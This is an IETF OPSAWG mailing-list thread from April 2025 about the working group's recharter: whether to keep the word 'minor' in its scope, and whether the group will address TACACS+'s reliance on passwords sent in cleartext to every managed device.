Hi Arnaud,
Agree the point you mentioned is a valid pending issue. That was ACKed in
draft-ietf-opsawg-tacacs-tls13-20#section-5.1.
OPSAWG is definitely the main entry point for TACACS+. Whether the work will be
pursued here depends on the availability of a contribution (which we don't have
right now) and some coordination with groups such as SSHM (noting that
currently this work seems to be out of scope of SSHM).
Cheers,
Med
> -----Message d'origine-----
> De : EBALARD Arnaud <arnaud.ebal...@ssi.gouv.fr>
> Envoyé : mardi 15 avril 2025 12:15
> À : BOUCADAIR Mohamed INNOV/NET <mohamed.boucad...@orange.com>;
> Gunter Van de Velde <gunter.van_de_ve...@nokia.com>; The IESG
> <i...@ietf.org>
> Cc : opsawg-cha...@ietf.org; opsawg@ietf.org
> Objet : RE: Gunter Van de Velde's No Objection on charter-ietf-
> opsawg-04-04: (with COMMENT)
>
>
> Hi Mohamed,
>
> I was about to write an email regarding OPSWAG recharter and how
> the WG will continue to address the operational issues with TACACS+
> (which will remain even after the publication of tacacs-tls draft).
> The discussion you started on the expected level of work of the WG
> ("minor") and the proposal to clarify it make me feel this is the
> right time to do it.
>
> TACACS+ is widely deployed for Authentication and Authorization on
> equipments in a lot of networks (large companies, telcos, etc.).
> Being supported by most vendors, having various functional
> benefits, and this large deployment base, it seems it is here to
> stay. As already discussed in [1], the protocol is old and suffers
> from two major security issues:
>
> 1/ weak protection of traffic;
> 2/ total reliance on passwords.
>
> Bit flipping and other issues (which currently allow for trivial
> access to equipments) associated with 1/ will be addressed by what
> has been specified in tacacs-tls draft. This effort is a good step
> forward but does not address 2/, which is the fundamental problem
> of TACACS+. Even after equipments ship with tacacs-tls,
> administrators (or supervision tools, etc.) on networks with
> TACACS+ deployed will still disseminate their (usually unique full
> power) password, which will be available in cleartext on all the
> equipments under TACACS+ control. A TACACS+ domain is one where an
> attacker just has to compromise a single weaker equipment and wait
> for a cleartext password to arrive to then have valid credentials
> to access ALL the equipments.
>
> My questions would be:
> - is the problem described above a subject to be addressed by the
> WG?
> - if it is, what is the expected way forward? Specifying support
> for pushing SSH public-keys (draft-dahm-opsawg-tacacs-security-
> 01?)? or X.509 certificate anchors? Other options?
> - if it is not, where can it be addressed? What would be the way
> forward?
>
> Cheers,
>
> Arnaud
>
> [1]:
> https://eur03.safelinks.protection.outlook.com/?url=https%3A%2F%2Fm
> ailarchive.ietf.org%2Farch%2Fmsg%2Fopsawg%2Fvdhi_wqIOLTOA7CN42WYk__
> d2-
> g%2F&data=05%7C02%7Cmohamed.boucadair%40orange.com%7C87891078d2174c
> 4c9f5d08dd7c066f9e%7C90c7a20af34b40bfbc48b9253b6f5d20%7C0%7C0%7C638
> 803089278435320%7CUnknown%7CTWFpbGZsb3d8eyJFbXB0eU1hcGkiOnRydWUsIlY
> iOiIwLjAuMDAwMCIsIlAiOiJXaW4zMiIsIkFOIjoiTWFpbCIsIldUIjoyfQ%3D%3D%7
> C0%7C%7C%7C&sdata=UQUBk6TBrNVyXGIgVPYM5MteldQ%2F%2FR2ld3re57wuB7c%3
> D&reserved=0
>
> -----Message d'origine-----
> De : mohamed.boucad...@orange.com <mohamed.boucad...@orange.com>
> Envoyé : lundi 14 avril 2025 09:55 À : Gunter Van de Velde
> <gunter.van_de_ve...@nokia.com>; The IESG <i...@ietf.org> Cc :
> opsawg-cha...@ietf.org; opsawg@ietf.org Objet : [OPSAWG]Re: Gunter
> Van de Velde's No Objection on charter-ietf-opsawg-04-04: (with
> COMMENT)
>
> Hi Gunter,
>
> There are many OPS-related protocols out there for which we don't
> have a home (IPFIX, DIAMETER, etc.). OPSAWG should not be the place
> to develop major changes (e.g. new versions) of these protocols.
>
> For example, we used to have opsawg be tagged as maintenance group
> for RADIUS
> (https://eur03.safelinks.protection.outlook.com/?url=https%3A%2F%2F
> mailarchive.ietf.org%2Farch%2Fmsg%2Fradext%2FygSshqCzKe0uN5aPiN08U_
> k-
> gx8%2F&data=05%7C02%7Cmohamed.boucadair%40orange.com%7C87891078d217
> 4c4c9f5d08dd7c066f9e%7C90c7a20af34b40bfbc48b9253b6f5d20%7C0%7C0%7C6
> 38803089278454972%7CUnknown%7CTWFpbGZsb3d8eyJFbXB0eU1hcGkiOnRydWUsI
> lYiOiIwLjAuMDAwMCIsIlAiOiJXaW4zMiIsIkFOIjoiTWFpbCIsIldUIjoyfQ%3D%3D
> %7C0%7C%7C%7C&sdata=bnia3snSx6nrcCus5DbPD7AZ2DchFFecJsMsSQ%2FOkF4%3
> D&reserved=0). I wasn't personally happy with that at the time for
> the reasons mentioned in that thread. Happily, RADEXT was
> resurrected since then and has its own WG (which is the right thing
> to do).
>
> I suggest we keep "minor" to make the scope clear. We can
> characterize it if needed, though.
>
> Thank you.
>
> Cheers,
> Med
>
> > -----Message d'origine-----
> > De : Gunter Van de Velde via Datatracker <nore...@ietf.org>
> Envoyé :
> > lundi 14 avril 2025 09:25 À : The IESG <i...@ietf.org> Cc :
> > opsawg-cha...@ietf.org; opsawg@ietf.org Objet : Gunter Van de
> Velde's
> > No Objection on charter-ietf-opsawg-
> > 04-04: (with COMMENT)
> >
> >
> > Gunter Van de Velde has entered the following ballot position for
> > charter-ietf-opsawg-04-04: No Objection
> >
> > When responding, please keep the subject line intact and reply to
> all
> > email addresses included in the To and CC lines. (Feel free to
> cut
> > this introductory paragraph, however.)
> >
> > -----------------------------------------------------------------
> --
> > COMMENT:
> > -----------------------------------------------------------------
> --
> >
> > This charter is refreshingly short, clear in its objective, and
> keeps
> > things nice and simple. Just a small comment on the text:
> >
> > "
> > Examples include the advancement of documents on the standards
> track,
> > application statements, maintenance, and minor extensions of
> documents
> > that were developed in working groups that have concluded, e.g.,
> > IPFIX, network or service level YANG modules, and tools for the
> > Operations and Management Area. "
> >
> > The word "minor" caught my attention. It might be open to
> > interpretation and could lead to debates later on about what
> qualifies
> > as "minor" versus something more substantial. Would it make sense
> to
> > drop that word to avoid any unnecessary restrictions or ambiguity
> down
> > the line?
> >
> >
>
> ___________________________________________________________________
> _________________________________________
> Ce message et ses pieces jointes peuvent contenir des informations
> confidentielles ou privilegiees et ne doivent donc pas etre
> diffuses, exploites ou copies sans autorisation. Si vous avez recu
> ce message par erreur, veuillez le signaler a l'expediteur et le
> detruire ainsi que les pieces jointes. Les messages electroniques
> etant susceptibles d'alteration, Orange decline toute
> responsabilite si ce message a ete altere, deforme ou falsifie.
> Merci.
>
> This message and its attachments may contain confidential or
> privileged information that may be protected by law; they should
> not be distributed, used or copied without authorisation.
> If you have received this email in error, please notify the sender
> and delete this message and its attachments.
> As emails may be altered, Orange is not liable for messages that
> have been modified, changed or falsified.
> Thank you.
>
> _______________________________________________
> OPSAWG mailing list -- opsawg@ietf.org
> To unsubscribe send an email to opsawg-le...@ietf.org Les données à
> caractère personnel recueillies et traitées dans le cadre de cet
> échange, le sont à seule fin d'exécution d'une relation
> professionnelle et s'opèrent dans cette seule finalité et pour la
> durée nécessaire à cette relation. Si vous souhaitez faire usage de
> vos droits de consultation, de rectification et de suppression de
> vos données, veuillez contacter contact.r...@sgdsn.gouv.fr. Si vous
> avez reçu ce message par erreur, nous vous remercions d'en informer
> l'expéditeur et de détruire le message. The personal data collected
> and processed during this exchange aims solely at completing a
> business relationship and is limited to the necessary duration of
> that relationship. If you wish to use your rights of consultation,
> rectification and deletion of your data, please contact:
> contact.r...@sgdsn.gouv.fr. If you have received this message in
> error, we thank you for informing the sender and destroying the
> message.
____________________________________________________________________________________________________________
Ce message et ses pieces jointes peuvent contenir des informations
confidentielles ou privilegiees et ne doivent donc
pas etre diffuses, exploites ou copies sans autorisation. Si vous avez recu ce
message par erreur, veuillez le signaler
a l'expediteur et le detruire ainsi que les pieces jointes. Les messages
electroniques etant susceptibles d'alteration,
Orange decline toute responsabilite si ce message a ete altere, deforme ou
falsifie. Merci.
This message and its attachments may contain confidential or privileged
information that may be protected by law;
they should not be distributed, used or copied without authorisation.
If you have received this email in error, please notify the sender and delete
this message and its attachments.
As emails may be altered, Orange is not liable for messages that have been
modified, changed or falsified.
Thank you.
_______________________________________________
OPSAWG mailing list -- opsawg@ietf.org
To unsubscribe send an email to opsawg-le...@ietf.org
